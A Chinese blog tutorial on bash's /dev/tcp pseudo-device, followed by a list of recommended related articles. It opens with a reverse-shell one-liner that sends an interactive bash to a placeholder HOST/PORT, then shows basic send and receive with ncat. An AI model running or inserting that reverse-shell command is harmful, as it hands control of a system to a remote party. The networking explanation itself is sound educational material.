/dev/tcp 的简单应用

最新推荐文章于 2025-08-07 15:08:04 发布

原创最新推荐文章于 2025-08-07 15:08:04 发布 · 5.6k 阅读

8 ·

CC 4.0 BY-SA版权

本文介绍了如何使用bash的特殊文件/dev/tcp进行网络通信，包括反弹bash shell、建立客户端与服务端连接、发送与接收数据及关闭连接的具体操作。

/dev/tcp不是磁盘里的文件，而是bash的一个功能

一、反弹bash shell

bash -i >& /dev/tcp/HOST/PORT 0>&1

二、收发数据
服务端用ncat等待连接 ncat -lp 6000 -v
然后客户端作为连接发起者这样做

exec 8<>/dev/tcp/gg.4fk.me/6000 #建立连接
ls /proc/self/fd/ #查看连接
echo -e "hello server!" >&8 #发数据
cat <&8 #收数据
exec 8>&- #关闭连接

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

hambaga

关注关注

0
点赞
踩
8

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

【开发知识点一】随机数生成器 /dev/urandom 和 /dev/random

weixin_43564241的博客

03-01

1313

urandom 熵池计数器计数会减去 N ，如果结果大于等于0 ，直接从 urandom 熵池中取出 N 个随机二进制位并返回，如果结果小于 0，请求不会阻塞，只不过返回的是 N 个伪随机二进制位，这里的伪随机二进制位是通过算法计算出来的，它的质量没有 urandom 熵池中提取出的随机二进制位高。主熵池、次熵池以及 urandom 熵池各自都有一个计数器，用一个整数值来记录，表示当前熵池中可用随机数的数量，这是一个预估的值，它是生成器根据熵池中的环境数据估算出来的。为了保证随机数的质量，

内网渗透-信息收集

MSB_WLAQ的博客

11-30

817

00 信息收集的方向主机存活探测主机端口开放情况主机服务探测主机操作系统探测网段分布情况漏洞信息探测主机内部信息搜集 / 域内信息搜集 01 主机内部信息收集操作系统默认 ttl 值 ① WINDOWS NT/2000 TTL:128 ② WINDOWS 95/98 TTL:32 ③ UNIX TTL:255 ④ LINUX TTL:64 ⑤ WIN7

参与评论您还未登录，请先登录后发表或查看评论

/dev/tcp 查看服务和端口

weixin_44597836的博客

06-01

2137

Linux下通信调试网络调试工具：常用的如 tcpdump,nc,lsof,netstat，telnet 可以快速调试tcp,udp服务今天介绍一个在shell中非常方便的 /dev/tcp/ip/端口原理 linux中有一个特殊的文件/dev/tcp,打开这个文件就类似于发出了一个socket调用，建立一个socket连接，读写这个文件就相当于在这个socket连接中传输数据。以读写方式打开/dev/tcp，并指定服务器名为： www.youkuaiyun.com,端口号为：80 exec 6&l

【bash】关于 /dev/(tcp|udp)/${HOST}/${PORT}

michaelwoshi的博客

09-21

7325

一、实验背景 Linux中的一个特殊文件：/dev/tcp 打开这个文件就类似于发出了一个socket调用，建立一个socket连接，读写这个文件就相当于在这个socket连接中传输数据。我们可以通过重定向实现基于tcp/udp协议的软件通讯，/dev/tcp/host/port 只要读取或者写入这个文件，相当于系统会尝试连接:host 这台机器，对应port端口。如果主机以及端口...

反弹shell总结

weixin_44576725的博客

04-26

4887

反弹shell 在介绍反弹链接的时候先说明什么是正向链接：假设我们攻击了一台机器，打开了该机器的一个端口，攻击者在自己的机器去连接目标机器（目标ip：目标机器端口），这是比较常规的形式，我们叫做正向连接。远程桌面，web服务，ssh，telnet等等，都是正向连接。而反弹shell是指攻击者指定服务端，受害者主机主动连接攻击者的服务端程序，就叫反弹连接。本质上是网络概念的客户端与服务端的角色反转。反弹shell简单来说就是通过命令让靶机的shell的控制权交到攻击者的机器中。可能有人会问：我们都能够在靶机

/dev/tcp/*/*

lyndon

11-21

9914

一些文件名在重定向中被 bash 特殊处理

linux中的一个特殊文件： /dev/tcp

最新发布

09-08

Modbus TCP 采集程序适合大规模工业自动化与物联网应用，可实现设备间的远程通信，便于与现有 IT 系统兼容 [^4]。以下是一个简单的 Python 示例，展示 Modbus RTU 和 Modbus TCP 数据采集程序的基本差异： **...

深入解析Linux系统中的/dev/tcp：网络通信的隐藏利器

宝子速来！这儿是我程序员的“快乐星球”博客。没有晦涩代码轰炸，满是斗bug糗事、技术趣闻。算法如神奇魔法，bug似调皮精灵，我用诙谐语言拆解编程，让你在欢笑中解锁代码新姿势，速来围观！

08-07

1112

本文介绍了Linux中Bash shell提供的虚拟设备/dev/tcp的功能与使用方法。/dev/tcp并非真实存在的设备文件，而是Bash内置的网络通信接口，允许在shell脚本中直接进行TCP通信而无需外部工具。文章详细讲解了其工作原理、基本语法（如exec 3<>/dev/tcp/ip/port建立连接）和实际应用场景，包括HTTP请求测试、端口扫描、简单文件传输等。这一特性在极简环境或需要快速网络测试时特别有用，但需注意它仅适用于Bash环境，且功能有限，不适合复杂网络操作。

LInux 内网渗透之极端情况文件落地技巧：不依赖 curl 或 wget 发出 HTTP 请求并实现文件传输——/dev/tcp的妙用

vortex5的博客

03-23

1305

在 Bash 脚本编程中，发送 HTTP 请求通常依赖于像curl或wget这样的外部工具。然而，Bash 本身隐藏着一个鲜为人知的功能：通过内置的/dev/tcp或/dev/udp伪设备，可以直接与网络进行交互，而无需额外安装任何工具。这个特性最初由 KornShell (ksh) 引入，后来被 Bash 继承，其设计初衷是为了方便用户通过网络发送数据，例如生成报告或执行简单的网络操作。然而，这个功能也因其强大而灵活的特性，常常被黑客或渗透测试人员利用，比如创建反向 Shell。

花一天时间搞懂反弹shell的命令！bash -i ＞& /dev/tcp/${HOST}/${PORT} 0＞&1！

weixin_53306211的博客

10-28

3837

【代码】花一天时间搞懂反弹shell的命令！

TCP

lanxiaoni的专栏

04-29

418

TCP(Transmission Control Protocol)　传输控制协议三次握手 TCP是主机对主机层的传输控制协议，提供可靠的连接服务，采用三次握手确认建立一个连接: 位码即tcp标志位,有6种标示: SYN(synchronous建立联机) ACK(acknowledgement 确认) PSH(push传送) FIN(finish结束)

使用bash shell来测试网络连接或通信 _ 统信 _ 麒麟 _ 中科方德

鹏大圣运维

05-20

2308

Hello，大家好啊！今天我们将讨论如何在国产操作系统统信UOS、麒麟KOS以及中科方德上使用bash shell的内置特性/dev/tcp来测试网络连接或进行简单的网络通信。这种方法不仅简便，而且非常适合快速排查网络问题。接下来，我将为大家详细介绍具体操作步骤。

渗透测试中的文件传输技巧

whatday的专栏

07-02

1731

目录搭建 HTTP server Python PHP 5.4+ Ruby Ruby 1.9.2+ Perl busybox httpd Download files from HTTP server Windows Linux Setup HTTP PUT server 使用 Nginx 搭建 HTTP PUT Server 使用 Python 搭建 HTTP PUT Server 上传文件到 HTTP PUT server Linux Windows 使用 Bash

【测试】echo发送和接收TCP/UDP数据包|shell 发送TCP/UDP数据包

木牛的博客

04-29

1080

原文链接：https://blog.youkuaiyun.com/nicai_xiaoqinxi/article/details/85311458。原文链接：https://blog.youkuaiyun.com/u010039418/article/details/86251470。原文链接：https://blog.youkuaiyun.com/blog_zxb/article/details/106402723。bash shell 的内置功能之一是通过/dev/tcp和/dev/udp设备文件打开TCP / UDP套接字。